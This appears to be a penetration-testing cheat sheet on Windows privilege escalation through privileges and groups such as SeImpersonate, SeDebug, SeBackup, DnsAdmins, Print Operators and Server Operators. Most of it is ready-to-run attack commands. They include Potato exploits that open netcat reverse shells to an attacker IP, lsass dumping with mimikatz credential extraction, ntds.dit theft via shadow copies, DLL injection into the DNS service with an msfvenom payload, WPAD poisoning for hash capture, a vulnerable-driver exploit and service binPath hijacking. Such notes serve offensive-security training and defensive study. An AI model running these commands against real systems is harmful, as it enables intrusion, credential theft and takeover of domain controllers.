Windows Privilege Escalation with Groups and Privileges

Contains the details of the topic Privilege Escalation/Windows/Groups and Privileges.

Active Directory Privileged Accounts and Groups GuideMicrosoftLearn

Full List

SeImpersonate & SeAssignPrimaryToken

These privileges can be used to impersonate a privileged account such as SYSTEM. Often these privileges are found in services such as Web, SQL, etc. Named pipes are used for local and remote Inter-Process communication. You have to create a named pipe and convince a privileged process to connect. After connecting, with SeImpersonatePrivilege you can impersonate that account and perform operations in its security context.

See Potatoes.

SigmaPotato

.\SigmaPotato.exe "<COMMAND>"
.\SigmaPotato.exe --revshell <IP> <PORT>

GodPotato

.\GodPotato.exe -cmd "<COMMAND>"

JuicyPotato

JuicyPotato.exe -l <PORT> -p <PROGRAM> -a <ARG> -t * [-c <{clsid}>]

!! Set -c <{clsid}> if necessary.

JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe <IP> <PORT> -e cmd.exe" -t *

PrintSpoofer

For Windows 10 and Server 2016/2019.

PrintSpoofer.exe -i -c powershell.exe

ex.

PrintSpoofer.exe -c "c:\tools\nc.exe <IP> <PORT> -e cmd"

Metasploit

In meterpreter session

load incognito
list_tokens -u  # to see token list
impersonate_token  “<GetFromDelegationToken>”

SeDebug

This privilege can be used to acquire sensitive information from system memory or elevate our privileges to SYSTEM.

Dump lsass

Task Manager > right click LSAProcess > Create dump file

or with procdump.exe

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Then extract hashes with mimikatz or pypykatz

mimikatz.exe
> sekurlsa::minidump lsass.dmp
> sekurlsa::logonpasswords

Privileged Shell

With psgetsystem

tasklist # take PID of winlogon.exe for example

. .\psgetsys.ps1
ImpersonateFromParentPid -ppid <PPID> -command <COMMAND> -cmdargs <ARGS>

SeTakeOwnership

With this privilege, a user could take ownership of any file or object and make changes that could result in access to sensitive data, RCE, or DoS.

takeown /f '<PATH_FILE>'
icacls <PATH_FILE> /grant <USER>:f

SeBackupPrivilege (Backup Operators)

The SeBackupPrivilege allows us to traverse any folder and list the folder contents. This will let us copy a file from a folder, even if there is no access control entry (ACE) for us in the folder's access control list (ACL). However, we can't do this using the standard copy command. Instead, we need to programmatically copy the data, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.

Read Sensitive Data

With SeBackupPrivilege

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege

Copy-FileSeBackupPrivilege <SOURCE> <DESTINATION>
cat <DESTINATION> 

Get ntds.dit from DC

Shadow copy of the drive with diskshadow.exe

diskshadow.exe 
> set verbose on 
> set metadata C:\Windows\Temp\meta.cab 
> set context clientaccessible 
> set context persistent 
> begin backup 
> add volume C: alias cdrive 
> create 
> expose %cdrive% E: 
> end backup 
> exit

Now we copy the ntds.dit file from drive E which, unlike the one in C, is not used by another process and therefore readable.

Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\ntds.dit

Or with robocopy

robocopy /B E:\Windows\NTDS .\ntds ntds.dit

Event Log Readers

Many Windows commands support passing a password as a parameter, and if process command line checking is enabled, this sensitive information will be captured. If you are part of the Event Log Readers group we can query Windows events from the command line using the wevtutil utility and the PowerShell Get-WinEvent cmdlet looking for sensitive information.

In PowerShell

wevtutil qe Security /rd:true /f:text | Select-String "/user"

wevtutil qe Security /rd:true /f:text /r:<REMOTE_PC> /u:<USER> /p:<PASS> | Select-String "/user"

Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*' } | ForEach-Object { $_.Properties[8].Value }

DnsAdmins

The DNS service is run with SYSTEM privileges. If you are part of the DnsAdmin group you can use the dnscmd utility to load a custom DLL with zero verification. When DNS is restarted, the DLL will be executed. the following attack can be executed when DNS is run on a Domain Controller (which is very common)

DLL Attack

Create DLL

msfvenom -p windows/x64/exec cmd='<COMMAND>' -f dll -o <NAME>.dll

Or enter system(“<COMMAND>”); under fclose in kdns.c and compile the project to get the modified mimilib.dll. The payload is executed for each query to the DNS service and all DNS queries will be logged in C:\Windows\system32\kiwidns.log

Load DLL

# Locally
dnscmd.exe /config /serverlevelplugindll <FULL_PATH_TO_DLL>

# Remotely
dnscmd.exe <DNS_SERVER> /config /serverlevelplugindll \\<MY_COMPUTER/IP>\<FULL_PATH_TO_DLL>

# check
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

Restart DNS

Or wait for reboot if you don't have permissions.

# Locally 
sc.exe stop dns
sc.exe start dns

# Remotely
sc.exe \\<DNS_SERVER> stop dns
sc.exe \\<DNS_SERVER> start dns

Cleaning Up

Must be taken from an elevated console with a local or domain admin account. Until our custom DLL is removed, we will not be able to properly start the DNS service again.

# Check
reg query \\<IP>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

# Remove
reg delete \\<IP>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

# Restart
sc.exe start dns 
sc.exe query dns # check if state is running

WPAD Attck

We need to disable the global query block list and creating a WPAD record. Every machine running WPAD with default settings will have its traffic proxied through our attack machine. We could use a tool such as Responder or Inveigh to perform traffic spoofing, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.

# Disabling the Global Query Block List 
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local

# Adding a WPAD Record
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3

Print Operators

Grants its members the SeLoadDriverPrivilege. If we issue the command whoami /priv, and don't see the SeLoadDriverPrivilege from an unelevated context, we will need to bypass UAC. Alternatively, from a GUI, we can open an administrative command shell.

Download the Capcom.sys driver. Use EoPLoadDriver to automate the process of enabling the privilege, creating the registry key, and executing NTLoadDriver to load the driver.

EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\<PATH>\Capcom.sys

Use ExploitCapcom to explit Capcom.sys

.\ExploitCapcom.exe

If we do not have GUI access to the target, we will have to modify the ExploitCapcom.cpp code before compiling, line 292, with msfvenom payload.

Note: Since Windows 10 Version 1803, the "SeLoadDriverPrivilege" is not exploitable, as it is no longer possible to include references to registry keys under "HKEY_CURRENT_USER".

Server Operators

The Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers. Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.

Querying Service

sc.exe qc AppReadiness

sc.exe qc VMTools

Modifying the Service Binary Path

sc.exe config AppReadiness binPath= "cmd /c <COMMAND>"

sc.exe config VMTools binPath= "cmd /c <COMMAND>"

Start the service

sc.exe stop AppReadiness
sc.exe start AppReadiness

sc.exe stop VMTools
sc.exe start VMTools

The service startup fails, as expected, but the command will be executed correctly.